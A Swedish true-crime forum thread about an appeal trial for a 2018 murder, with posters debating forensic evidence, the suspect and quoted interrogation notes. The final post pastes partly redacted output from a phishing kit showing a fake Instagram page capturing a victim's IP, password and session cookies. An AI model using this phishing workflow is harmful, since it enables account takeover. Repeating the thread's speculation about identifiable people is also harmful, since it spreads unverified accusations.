2021-04-14, 15:22
Medlem
Fröken_Sveriges avatar
Citat:
Ursprungligen postat av Mumsbulle
Soa går fram och påpekar att reportern skrivit fel, att SD inte är ensam i salen med munskydd. En phörare har också munskydd. Rätt ska vara rätt.
Eh, joråsatte, säger pappsen så när dottern fuskar cacheloggar?

Rätt ska vara rätt. Att en man är otrogen mot ens dotter i minst sex år är "ETT misstag". En riktig Rickard Rättrådig, är han...när det passar honom.

#TeamÅsaHiding Tick, tack, tick, tack....

Bildmix på en levande och glad Len* som någon tog sig rätten att brutalt mörda med 17 slag mot huvud och ansikte
www.bildtagg.se/bild/akkk0foxtbklz824flveummc
Senast redigerad av Fröken_Sverige 2021-04-14 kl. 15:40.
Citera
2021-04-14, 15:36
Medlem
Citat:
Ursprungligen postat av GilGrissom82
Spår av LWs dna fanns väl under plösen på hans vänstersko, om jag inte minns fel?

Hinner inte söka i FUP, men här kommer ett gammalt inlägg i all hast:

(FB) Lena Wesström anmäld försvunnen (2018-05-15) hittad död (2018-05-19)

Så ifall LWs dna hittades på SDs vänstersko, så borde väl rimligtvis även hans vänstra cykelpedal ha skickats till NFC. För om hennes dna i/på hans sko härstammar från mordet så skulle ju rent tekniskt även hennes dna ha kunnat finnas på SDs vänstra pedal, ifall han använde cykeln efter mordet. Jag påstår inte att det måste finnas där, men utredarna borde väl ha kollat även vänsterpedalen för att antingen bekräfta eller avfärda möjligheten.

Helt rimliga tankar.

Cykeln undersöktes först med vitt ljus och leukomalakitgrönt och sen:

”Undersökningen avslutades med att Luminol (Blue Star)3 inledningsvis applicerades på vänster fotpedal och vänster handtag på styret men någon reagens erhölls ej. När mot* svarande åtgärd gjordes på det högra handtaget och höger fotpedal blev det en tydlig reagens. Undersökningen avbröts varefter det högra handtaget (G134) och höger fotpedal (G133) monterades bort.”

Cykeln undersöktes 2018-06-20.

Plösen undersöktes 2019-06-03.
Citera
2021-04-14, 15:40
Medlem
Citat:
Ursprungligen postat av notknapparen
Nu var det Avels tanke där. Jag är inte insatt i de här forensiska stegen; hur, när, var och vad...

Avel visade en fin bild på ett fotavtryck ju, som tagits efter att man sprayat (?) med Luminol. Då såg man ett fint skoavtryck i plagget (?).

Här tänker jag att Avel menar att visserligen kan man med blotta ögat se vissa avtryck, medan andra kan vara osynliga. Det kan dock framträda en bättre bild om man använder Luminol?

Det bästa är väl att Avel själv bevarar frågan.

För mig känns det svårt att veta exakt hur forensikern tänkte utan att ha lysnat på hans vittnesmål igen. Men jag har något kvar i minnet av att han pratade något om att plgget kunnat vara skrynklat när atrycket gjordes.

Då tänker jag att det ändå är svårt att avgöra, oavsett Luminol eller inte, om man inte lyckas skrynkla tillbaka tyget i exakt samma veck då. Vilket kanske är svårt? Avtrycket kan ju ha skett i en rörelse som Lena gjorde till exempel med benen.

Ja, jag vet inte om jag orkar fördjupa mig i det där.

Ja du har fattat vad jag är inne på. Tack.

De måste ju analysera det misstänkta skoavtrycket. Då är det ju bra att försöka med alla medel tillåtna att få fram mönstret.

Orkar inte ta ett varv på nätet med alla metoder de hade kunnat använda men känns som de inte har de inte löpt linan fullt ut här.
Citera
2021-04-14, 15:43
Medlem
Citat:
Ursprungligen postat av Rosamund
Om jag förstått rätt från Bollkalle19:s rapport har en andra tekniker uttalat sig om att skoavtrycken går att matcha vid jämförelse med rätt sko.

Skulle det nu vara så så skulle det ju vara bra om NFC visade vilket mönster de kommit fram till som den här jämförelsen då kunde göras med.
Citera
2021-04-14, 15:44
Medlem
Citat:
Vilket i så fall innebär att skoavtrycken inte är samma som SDs skor som man hittat spår av blod/dna. För dessa skor har man ju uppenbarligen tagit i beslag och haft möjlighet att matcha med skoavtrycket. Så om skoavtrycket inte tillhör de dnabesudlade skor som ÅK använder i sin bevisföring innebär det ytterligare ett incitament för att "utom rimligt tvivel" inte kan åberopas

Skröt inte SD förresten med att polisen missat att ta ett par i beslag som han dessutom hade på sig när han hämtade ut sina dojjor hos hittegodsavdelningen. Tjejen som jobbade där blev illa till mods osv.
Citera
2021-04-14, 15:49
Medlem
develis avatar
Citat:
Ursprungligen postat av Avel
Tydlighet.

https://www.bildtagg.se/bild/njqjhfbikmcmaecqkbns5xtn

NFC har tolkat evtl skoavtryck på tröja och kjol m h a foton på CD-skiva. Framgår inte av protokollet hur de bilderna såg ut. Antar det är av den här typen:

https://www.bildtagg.se/bild/ziaizaa4978r0bjaldsy5fzv
Ja, och det lär bero på yta det är avsatt på, position, drag och tryck.
De kunde knappt avgöra om det var ens en klack.
Vilket berodde på att det var inte ett optimalt avtryck. Är det ens blod eller är det smuts.

Du kan väl inte ta ett random foto och tro att det är avhängigt Luminol som nån mirakelkur?
Är det ens avsatt på tyg mot mjukt underlag (kropp) eller fotat på ett golv på en BP?

För övrigt kan bero på prioritering, att de inte vill riskera att förstöra annat med den metoden.
Citera
2021-04-14, 15:53
Medlem
Fröken_Sveriges avatar
Citat:
Ursprungligen postat av pushlr

Ja, du min högst ovetenskapliga - men inte helt otroliga - teori om att man ser sex års otrohet som "ETT misstag", är att man själv har erfarenhet av motsvarande händelseförlopp, och därmed är van vid att minimera den stora skadan som en sådan långvarig, vidrig och utstuderad otrohet gör på den drabbade parten och andra nära?

#TeamÅsaHiding Tick, tack, tick, tack....

SD om varför han fnissar och skrattar i rättssalen
https://vocaroo.com/18Ww0MjnjyC
Citera
2021-04-14, 16:03
Medlem
develis avatar
Citat:
Spår av LWs dna fanns väl under plösen på hans vänstersko, om jag inte minns fel?

Hinner inte söka i FUP, men här kommer ett gammalt inlägg i all hast:

(FB) Lena Wesström anmäld försvunnen (2018-05-15) hittad död (2018-05-19)

Så ifall LWs dna hittades på SDs vänstersko, så borde väl rimligtvis även hans vänstra cykelpedal ha skickats till NFC. För om hennes dna i/på hans sko härstammar från mordet så skulle ju rent tekniskt även hennes dna ha kunnat finnas på SDs vänstra pedal, ifall han använde cykeln efter mordet. Jag påstår inte att det måste finnas där, men utredarna borde väl ha kollat även vänsterpedalen för att antingen bekräfta eller avfärda möjligheten.
Varför skulle hennes DNA finnas på pedalen?
Han kan ha väl ha tagit av sig skor likaväl som ett par handskar etc. alltså bytt om helt innan han kliver ut på mer allmän plats.
Kan väl tänka mig att det stänkt en hel del.
Att han typ varit där och placerat en bag med ombyte innan han går till LW.
Om skorna åkt i maskinen så är det väl möjligt att hennes dna dock inte försvann inuti skon, i plösen.
Citera
2021-04-14, 16:03
Medlem
Citat:
Ursprungligen postat av Avel
Ja det är ju där hela hans plan faller.

Han vet att ett fåtal vänner och bekanta känner till ”otrohetsaffären”.

Men det är rätt riskfyllt att bygga en hel mordplan på det.

För det tar ett telefonsamtal från UW så BAM 14 000 sidor utredning tema SD:s och LW:s ”otrohetsaffär”.

Så bra gick det att flyga under radarn.

Flyga under polisens radarn är svårt med den digitala dynga han bör veta att de lämnat efter sig.

Jag tror inte att hela mordplanen bygger på det, men att det är en väsentlig del. I hans världsbild tror alla omkring dem att affären upphörde vid avslöjandet våren 2017. Så varför bli misstänkt för att ha något att göra med en före detta älskarinnans våldsamma död? En kvinna som inte är rädd för att ge sig ut i mörket själv och därmed utsätter sig för okända faror. Därav panikradering och 937 nya bilder på mobilen när han plötsligt ska in på ett andra förhör. Han inser att han kommer att bli granskad som mer än vän. I första förhöret säger han att han har haft en relation, för ett par år sedan. Men att LW nu bara är en väldigt god vän. Det är exakt den bilden han tror att omvärlden har och varför han är rädd för att avslöjande.

Första förhöret med SD
SD berättar att han och L*ena är vänner sedan 13 år tillbaka. De umgicks med familjerna
när båda var gifta på varsitt håll och bodde grannar.
SDs fru blev allvarligt sjuk och var bara som ett "skal". SD sökte då tröst hos L*na,
som har arbetat som frikyrkopastor.
SD och L*na hade sedan en kärleksrelation i fyra-fem års tid. L*na var då skild, men inte
SD.
För cirka två år sedan så började deras kärleksrelation ta slut men de är fortfarande vänner, och SD har starka känslor för Lena fortfarande.
SD ville dock gå tillbaka till sin fru när hon mådde bättre.
Båda är intresserade av geocashing.
L*na och SD har daglig kontakt nu i princip. Men de är bara vänner nu. SD har starka
känslor för L*na och de har en betydelsefull vänskap.
Citera
2021-04-14, 16:04
Medlem
Citat:
Ursprungligen postat av Mumsbulle
Jag kan bekräfta att den som sitter med som åhörare, på SDs sida är ingen mindre än fd svärfar, SOA. Efter förhandlingarna väntar han på SD som kommer ut och tar av masken och knallar runt som en fri man

Oj ser man på. Mr. Alla Kan Göra Ett Misstag som stöttar sonen han aldrig fick.
🙄 Jag misstänkte att det var SDs bror. Tyckte nån sa att SOA inte fick vara åhörare pga att han är vittne.
Citera
2021-04-14, 16:07
Medlem
Rosamunds avatar
Citat:
Ursprungligen postat av develi
Varför skulle hennes DNA finnas på pedalen?
Han kan ha väl ha tagit av sig skor likaväl som ett par handskar etc. alltså bytt om helt innan han kliver ut på mer allmän plats.
Kan väl tänka mig att det stänkt en hel del.
Att han typ varit där och placerat en bag med ombyte innan han går till LW.
Om skorna åkt i maskinen så är det väl möjligt att hennes dna dock inte försvann inuti skon, i plösen.

Jag tror man kom fram till att skorna inte blivit maskintvättade. Om tvätt förekommit har det i så fall varit för hand, stod det.
Citera
2021-04-14, 16:09
Medlem
Tyvärr så kommer ju inte de här inloggningarna och sökningarna i LW:s Google/GC/Instagram ha nåt bevisvärde i hovrätten men det är ändå lurigt att de skett.

Har funderat lite på hur någon kommit åt LW:s Instagram och om lösenordet då varit känt före eller efter hennes död. Det mesta lutar väl åt att lösenorden varit kända av den som ”hackat”.

Om lösenordet är okänt då? Det här att hacka någons Instagram eller Linkedin eller ja vad som än kräver inloggning är inte så väldigt krångligt.

Ett par knapptryckningar från ”förövarens sida” så har man antingen åtkomst via lösenord eller ”cookies” (Neutraliserat lite):

[*] Starting php server...[*] Starting xxxx server... [*] Xxxxxxxx: [*] Waiting victim xxxxx ...[*] IP Found![*] Victim IP: xxx.xxx.xxx.xxx [*] User-Agent: User-Agent: Xxxx/x.0 (X11; Xxxxx rv:x.0) Gecko/x Xxx/x.0[*] Saved: instagram/saved.ip.txt[*] Waiting credentials ...[*] Credentials Found![*] Account: saxxxxxxan@gmail.com [*] Password: xxxxxxxxxxxx[*] Saved: sites/instagram/saved.usernames.txt
┌──(root💀xxxx)-[/home/xxx/xxxxxxx]
└─#

+++++++++

[+] Choose a Port Forwarding option: 2
[+] Choose a website (Default: https://instagram.com ): https://instagram.com
[+] xxxx Credentials
[+] Email: xxx
[+] Password: xxx
[+] Starting php server...
[+] Starting xxx server... [*] Server: https://94xxxx490.xxxx.io [*] Usage:
xxxxxxxxx [*] xxxx link: xxxxxx [*] Waiting targets, Press Ctrl + C to exit...
[+] Target opened the link!
[+] IP: xxx.xxx.xxx.xxx
[+] Cookies saved: cookies.backup
┌──(root💀xxx)-[/home/xxx]
└─# cd xxxx
┌──(root💀xxx)-[/home/xxx/xxx]
└─# ls
cookies.backup get.php index.php ip.php xxxxx README.md saved.ip.txt xxxxx.sh
┌──(root💀xxx)-[/home/xxx/xxxxx]
└─# cat cookies.backup
mid=XsYGMQALAxxxxxxdOqBKpj1oAJs6; csrftoken=2Z8ovGnPxxxxxx2GlPLWBIAj4zFD; ds_user_id=xxxxxxxxxxx
┌──(root💀xxx)-[/home/xxx/xxx]
└─# cat saved.ip.txt
IP: xxx.xxx.xxx.xxx
User-Agent: Xxxxx/x (X11; xxxx x86_64; rv:x.0) Xxx/x xxxxx/x.0┌──(root💀xxx)-[/home/xxx/xxx]
└─#
Citera

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in